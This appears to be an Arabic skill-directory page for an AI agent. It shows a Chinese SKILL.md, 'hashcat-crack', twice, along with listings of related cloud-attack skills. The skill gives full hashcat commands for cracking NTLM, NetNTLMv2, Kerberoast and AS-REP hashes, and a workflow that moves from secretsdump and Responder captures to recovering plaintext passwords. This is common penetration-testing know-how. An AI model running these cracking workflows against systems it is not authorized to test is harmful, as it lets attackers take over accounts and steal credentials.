تشغيل أي مهارة في Manus بنقرة واحدة

hashcat-crack

النجوم١٬٤٩٣

التفرعات٢٢٩

آخر تحديث٢١ مايو ٢٠٢٦ في ٠٩:١٧

使用 hashcat 进行密码哈希离线破解。当获取到密码哈希（NTLM/NTLMv2/Kerberos TGS/AS-REP/SHA/MD5/bcrypt/NetNTLMv2）需要还原明文密码时使用。hashcat 是 GPU 加速的密码破解工具，比 john 快几十倍。覆盖哈希类型识别、字典攻击、规则攻击、掩码攻击、组合攻击。拿到 hashdump/secretsdump/Kerberoast/AS-REP 输出后必用此技能

التثبيت

التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.

تشغيل في Manus

المصدر

wgpsec

wgpsec/AboutSecurity

فتح مستودع GitHub عرض مستودعات المنشئ

تنزيل

تشغيل في Manus

المهن ذات الصلةSOC

استنادا إلى تصنيف SOC المهني

محللو أمن المعلوماتمهن الحاسوب والرياضيات·SOC 15-1212

SKILL.md

readonly

name	hashcat-crack
description	使用 hashcat 进行密码哈希离线破解。当获取到密码哈希（NTLM/NTLMv2/Kerberos TGS/AS-REP/SHA/MD5/bcrypt/NetNTLMv2）需要还原明文密码时使用。hashcat 是 GPU 加速的密码破解工具，比 john 快几十倍。覆盖哈希类型识别、字典攻击、规则攻击、掩码攻击、组合攻击。拿到 hashdump/secretsdump/Kerberoast/AS-REP 输出后必用此技能
metadata	{"tags":"hashcat,crack,hash,password,ntlm,kerberos,tgs,md5,sha,密码,破解,GPU,john,哈希","category":"tool"}

hashcat 密码哈希离线破解

hashcat 利用 GPU 加速哈希破解，速度远超 CPU。核心工作流：识别哈希类型 → 选择攻击模式 → 喂字典/规则/掩码。

哈希类型识别（-m 参数）

哈希类型	-m 值	来源
NTLM	1000	hashdump / secretsdump
NetNTLMv1	5500	Responder 抓包（旧系统/降级攻击）
NetNTLMv2	5600	Responder / ntlmrelayx 抓包
Kerberos TGS (Kerberoast)	13100	GetUserSPNs.py
Kerberos AS-REP	18200	GetNPUsers.py
MD5	0	Web 数据库泄露
SHA-256	1400	—
Raw SHA-512	1700	128 字符十六进制摘要
sha512crypt ($6$)	1800	Linux /etc/shadow
bcrypt	3200	Web 应用
DCC2 (Domain Cached Credentials 2)	2100	secretsdump 域缓存凭据
WPA-PBKDF2	22000	WiFi 握手包

攻击模式

字典攻击（最常用）

# 基本字典攻击
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

# 加规则（变形字典，如 password → Password1!）
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# 常用规则文件
# best64.rule — 64 条高效规则，速度和效果平衡
# rockyou-30000.rule — 大规则集，覆盖更多变形
# OneRuleToRuleThemAll.rule — 社区最强规则集

掩码攻击（已知密码模式）

# 8 位纯数字
hashcat -m 1000 hashes.txt -a 3 ?d?d?d?d?d?d?d?d

# 首字母大写 + 6 位小写 + 1 位数字（如 Password1）
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d

# 掩码字符集：?l=小写 ?u=大写 ?d=数字 ?s=特殊 ?a=全部

组合攻击

# 两个字典组合（word1+word2）
hashcat -m 1000 hashes.txt -a 1 dict1.txt dict2.txt

实战场景

Kerberoast 破解

# GetUserSPNs.py 输出 → hashcat
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

AS-REP Roasting 破解

GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

NTLM 哈希破解（hashdump/secretsdump）

# secretsdump 输出格式：user:RID:LM:NTLM:::
# 提取 NTLM 部分
cat secretsdump.txt | awk -F: '{print $4}' | sort -u > ntlm.txt
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

NetNTLMv2 破解（Responder 抓取）

hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt

实用参数

# 查看已破解结果
hashcat -m 1000 hashes.txt --show

# 继续中断的任务
hashcat -m 1000 hashes.txt --restore

# 只跑 GPU（不用 CPU）
hashcat -m 1000 hashes.txt -D 2

# 设置工作负载（1=低 2=默认 3=高 4=极限）
hashcat -m 1000 hashes.txt -w 3

# 内核优化（截断密码长度换速度，多数场景够用）
hashcat -m 1000 hashes.txt -O

# 输出到文件
hashcat -m 1000 hashes.txt wordlist.txt -o cracked.txt

决策树

拿到哈希后：
├─ 知道哈希类型 → 直接 hashcat -m 值
├─ 不确定类型 → hashcat --identify hashes.txt 或 hashid
├─ 有 GPU → hashcat（首选）
├─ 无 GPU / CPU 环境 → john the ripper
└─ 在线查询 → hashes.org / crackstation.net（先试再跑）

المزيد من هذا المستودع

نفس المستودع

azure-pentesting

wgpsec/AboutSecurity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

2026-06-211.5k

gcp-exploit

wgpsec/AboutSecurity

GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举

2026-05-211.5k

gcp-pentesting

wgpsec/AboutSecurity

GCP 云环境渗透测试总体方法论。当目标使用 Google Cloud Platform、发现 GCP 相关资产（GCS Bucket/Compute Engine/Cloud Functions/GKE）、获取 GCP 凭据（Service Account Key/OAuth Token/Metadata Token）、或需要对 GCP 环境进行安全评估时使用。提供从未授权枚举到提权、后渗透、GCP-to-Workspace 穿越的全流程决策树。覆盖 37+ GCP 服务攻击面

2026-05-211.5k

serverless-attack

wgpsec/AboutSecurity

Serverless/云函数安全测试与攻击。当目标涉及 AWS Lambda、腾讯云 SCF、阿里云 FC、Azure Functions 等 Serverless 服务时使用。当发现 API Gateway 后端是 Lambda/SCF 触发、通过 cloud-aksk-exploit 获取到函数操作权限、或需要分析云函数代码中的漏洞时使用。覆盖事件注入（HTTP/OSS/消息队列触发器参数篡改）、环境变量泄露（硬编码凭据提取）、函数代码注入/覆盖（UpdateFunctionCode）、Runtime 利用（/tmp 写入/Layer 劫持/依赖投毒）、临时凭据滥用。发现任何 Lambda/SCF/云函数、API Gateway、或 Serverless 架构时都应使用此 skill

2026-05-211.5k

tencent-pentesting

wgpsec/AboutSecurity

腾讯云渗透测试方法论。当目标使用腾讯云服务、发现 cos.*.myqcloud.com 资产、获取腾讯云 SecretId/SecretKey、在 CVM 实例内可访问 metadata.tencentyun.com 元数据、或需要对腾讯云 CAM/CVM/COS/TencentDB/TKE/SCF 等服务进行安全评估时使用。覆盖 CAM 提权、CVM 接管、COS 对象存储利用、TencentDB 数据库攻击、TKE 容器集群、SCF 云函数、CLB 负载均衡、CLS 日志服务、KMS 密钥管理

2026-05-211.5k

java-injection-audit

wgpsec/AboutSecurity

Java 源码注入类漏洞审计。当在 Java 白盒审计中需要检测注入类漏洞时触发。覆盖 6 种注入: SQL 注入(JDBC/MyBatis/Hibernate/JPA)、命令注入(Runtime.exec/ProcessBuilder)、 SSRF(HttpURLConnection/OkHttp/RestTemplate)、LDAP 注入、SpEL/OGNL 表达式注入、NoSQL 注入(MongoDB)。需要 java-audit-pipeline 提供的数据流证据(EVID_*)作为审计输入。

2026-05-211.5k

name	hashcat-crack
description	使用 hashcat 进行密码哈希离线破解。当获取到密码哈希（NTLM/NTLMv2/Kerberos TGS/AS-REP/SHA/MD5/bcrypt/NetNTLMv2）需要还原明文密码时使用。hashcat 是 GPU 加速的密码破解工具，比 john 快几十倍。覆盖哈希类型识别、字典攻击、规则攻击、掩码攻击、组合攻击。拿到 hashdump/secretsdump/Kerberoast/AS-REP 输出后必用此技能
metadata	{"tags":"hashcat,crack,hash,password,ntlm,kerberos,tgs,md5,sha,密码,破解,GPU,john,哈希","category":"tool"}

hashcat 密码哈希离线破解

hashcat 利用 GPU 加速哈希破解，速度远超 CPU。核心工作流：识别哈希类型 → 选择攻击模式 → 喂字典/规则/掩码。

哈希类型识别（-m 参数）

哈希类型	-m 值	来源
NTLM	1000	hashdump / secretsdump
NetNTLMv1	5500	Responder 抓包（旧系统/降级攻击）
NetNTLMv2	5600	Responder / ntlmrelayx 抓包
Kerberos TGS (Kerberoast)	13100	GetUserSPNs.py
Kerberos AS-REP	18200	GetNPUsers.py
MD5	0	Web 数据库泄露
SHA-256	1400	—
Raw SHA-512	1700	128 字符十六进制摘要
sha512crypt ($6$)	1800	Linux /etc/shadow
bcrypt	3200	Web 应用
DCC2 (Domain Cached Credentials 2)	2100	secretsdump 域缓存凭据
WPA-PBKDF2	22000	WiFi 握手包

攻击模式

字典攻击（最常用）

# 基本字典攻击
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

# 加规则（变形字典，如 password → Password1!）
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# 常用规则文件
# best64.rule — 64 条高效规则，速度和效果平衡
# rockyou-30000.rule — 大规则集，覆盖更多变形
# OneRuleToRuleThemAll.rule — 社区最强规则集

掩码攻击（已知密码模式）

# 8 位纯数字
hashcat -m 1000 hashes.txt -a 3 ?d?d?d?d?d?d?d?d

# 首字母大写 + 6 位小写 + 1 位数字（如 Password1）
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d

# 掩码字符集：?l=小写 ?u=大写 ?d=数字 ?s=特殊 ?a=全部

组合攻击

# 两个字典组合（word1+word2）
hashcat -m 1000 hashes.txt -a 1 dict1.txt dict2.txt

实战场景

Kerberoast 破解

# GetUserSPNs.py 输出 → hashcat
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

AS-REP Roasting 破解

GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

NTLM 哈希破解（hashdump/secretsdump）

# secretsdump 输出格式：user:RID:LM:NTLM:::
# 提取 NTLM 部分
cat secretsdump.txt | awk -F: '{print $4}' | sort -u > ntlm.txt
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

NetNTLMv2 破解（Responder 抓取）

hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt

实用参数

# 查看已破解结果
hashcat -m 1000 hashes.txt --show

# 继续中断的任务
hashcat -m 1000 hashes.txt --restore

# 只跑 GPU（不用 CPU）
hashcat -m 1000 hashes.txt -D 2

# 设置工作负载（1=低 2=默认 3=高 4=极限）
hashcat -m 1000 hashes.txt -w 3

# 内核优化（截断密码长度换速度，多数场景够用）
hashcat -m 1000 hashes.txt -O

# 输出到文件
hashcat -m 1000 hashes.txt wordlist.txt -o cracked.txt

决策树

拿到哈希后：
├─ 知道哈希类型 → 直接 hashcat -m 值
├─ 不确定类型 → hashcat --identify hashes.txt 或 hashid
├─ 有 GPU → hashcat（首选）
├─ 无 GPU / CPU 环境 → john the ripper
└─ 在线查询 → hashes.org / crackstation.net（先试再跑）